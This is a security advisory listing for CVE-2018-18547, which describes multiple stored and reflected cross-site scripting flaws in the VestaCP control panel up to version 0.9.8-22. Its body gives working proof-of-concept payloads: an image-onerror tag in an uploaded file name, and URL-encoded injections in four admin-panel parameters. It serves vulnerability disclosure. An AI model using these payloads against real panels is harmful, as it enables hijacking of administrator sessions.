VestaCP 0.9.8-22 Cross Site Scripting

🗓️ 22 Oct 2018 00:00:00Reported by Numan OZDEMIRType

packetstorm🔗 packetstormsecurity.com👁 46 Views

VestaCP 0.9.8-22 Cross Site Scripting, high risk stored and reflected XSS vulnerabilitie

Reporter	Title	Published	Views	Family All 9
0day.today	VestaCP 0.9.8-22 Cross Site Scripting Vulnerability	23 Oct 201800:00	–	zdt
Circl	CVE-2018-18547	23 Oct 201812:40	–	circl
CNVD	VestaCP Cross-Site Scripting Vulnerability	24 Oct 201800:00	–	cnvd
CVE	CVE-2018-18547	24 Oct 201821:00	–	cve
Cvelist	CVE-2018-18547	24 Oct 201821:00	–	cvelist
EUVD	EUVD-2018-10268	7 Oct 202500:30	–	euvd
NVD	CVE-2018-18547	24 Oct 201821:29	–	nvd
OSV	CVE-2018-18547	24 Oct 201821:29	–	osv
Prion	Design/Logic Flaw	24 Oct 201821:29	–	prion

`[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22  
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)  
[+] Vendor Homepage: vestacp.com  
[+] Version: Up to v0.9.8-22.  
[+] CVE: CVE-2018-18547  
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs  
[+] [email protected] - [email protected]  
  
[~] Description:  
  
Insert any XSS payload. I will use <img src onerror=alert(1337)>  
  
https://IP:8083/list/directory/  
-> Stored XSS:  
A visitor may upload a file as named xss payload, using any form in your   
website.  
If VestaCP user see this file in the interface, his browser will run the   
JavaScript.  
So this vulnerability makes high risk.  
  
https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E  
-> Reflected XSS  
  
https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E  
-> Reflected XSS  
  
https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E  
-> Reflected XSS  
  
https://IP:8083/list/directory/?dir_a=">alert(1337);//  
-> Reflected XSS  
  
// for secure days...  
  
`

22 Oct 2018 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.00234